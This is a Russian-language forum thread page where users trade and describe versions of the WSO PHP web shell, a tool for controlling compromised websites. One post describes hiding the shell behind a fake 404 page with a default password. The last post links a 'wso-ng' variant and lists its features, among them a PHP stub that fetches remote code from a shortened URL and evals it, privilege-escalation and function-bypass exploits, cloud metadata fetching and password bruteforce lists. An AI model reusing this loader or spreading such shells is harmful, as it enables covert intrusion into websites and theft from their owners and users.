Старый 14.12.2020, 01:56   #251
billar
 
Регистрация: 08.04.2018
Сообщений: 1
Репутация: 0
По умолчанию

Цитата:
Сообщение от Replace Посмотреть сообщение
Но при переходе в любую директорию просит пароль. При вводе пароля остаюсь на том же месте. Как это можно исправить?
В JS надо удалить функцию base64 заменив ее на btoa().
billar вне форума   Ответить с цитированием
Старый 14.11.2021, 01:43   #252
yourcatispwned
 
Регистрация: 19.08.2019
Сообщений: 2
Репутация: 0
По умолчанию

Цитата:
Сообщение от Pirat Посмотреть сообщение
Выложил свой старый webshell wso в открытый доступ, мне он пока не нужен.

Изменения:
Теперь webshell сложно обнаружить даже если зайти по файлу wso.php.
Что бы войти нужно нажать один раз Tab и ввести пароль "admin" иначе вы будете смотреть на оригинальную страницу ошибки 404. Ошибка всегда уникальная в зависимости от сайта, wso использует оригинальные ошибки сайта.
Удален устаревший код sql, вырезан полностью, но вы можете подключить adminer для доступа к базе данных.
Исправлен дизайн hard_linux
Добавлен анонимайзер
Добавлены имена забытых авторов, если кого то забыли, напишите об этом.
https://github.com/twepl/wso/
Есть у кого этот шелл?( Был у меня, да потерялся(
yourcatispwned вне форума   Ответить с цитированием
Старый 31.12.2021, 04:16   #253
Aels
 
Аватар для Aels
 
Регистрация: 24.12.2010
Сообщений: 17
Репутация: 2
По умолчанию

Добавлю уж свой вариант.
https://github.com/aels/wso-ng/blob/main/wso-ng.php
Цитата:
can now hook password when loaded via stub <?php eval(substr(file_get_contents('https://bit.ly/get-wso-ng?pass=ed78a48738eb97ffb5624741bdf391c3'), 5)); ?>, and will use it instead of hardcoded one
all subfile downloads are now cached in /tmp and zipped
login page show natural site "404 not found" page. Just type password and press Enter, cuz password field hidden offscreen, but focused already.
new breadcrumbs navigation panel. Must be much more useful.
all files\dirs are now highlighted as their edit\view rights
go to file\path right from the breadcrumbs field
add fastCGI exploit to auto-elevate & bypass disabled functions when possible
add php add-filter exploit to bypass disabled functions and gain console execution when possible
ajax interaction now is default
Ctrl+Enter on any field to Save\Run
added "Fetch AWS metadata" command to bookmarks
added hotlink to "Linux Exploit Suggester v2" by default.
added VirusTotal integration, to autocheck IP reputation.
added https://securitytrails.com integration, to show neighbors on same IP.
added ip-info integration to show domains on same server
added reverse ip check, to show real IP, and not local.
added memory, cores and load average info to top bar.
click on IP to copy it
added list of open ports & sockets to Sec. Info section. Works ever if no console priveleges available, thru fsock.
added support for phpRedis in Sec. Info section.
reworked "Userful" section. Works thru limits of open basedir now.
you can touch files right in file list of file manager now.
fast copy name\path to clipboard by click.
neat syntax highlighting everywhere.
neat PHP code editing with autoindent support.
default top1000 password list (https://bit.ly/top1kpass) in "Bruteforce" section.

Последний раз редактировалось Aels; 03.01.2022 в 09:28..
Aels вне форума   Ответить с цитированием
Ответ

Метки
shell, wso, wso2

Опции темы Поиск в этой теме
Поиск в этой теме:

Расширенный поиск
Опции просмотра

Ваши права в разделе
Вы не можете создавать новые темы
Вы не можете отвечать в темах
Вы не можете прикреплять вложения
Вы не можете редактировать свои сообщения

BB коды Вкл.
Смайлы Вкл.
[IMG] код Вкл.
HTML код Выкл.

Быстрый переход



Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2022, Jelsoft Enterprises Ltd. Перевод: zCarot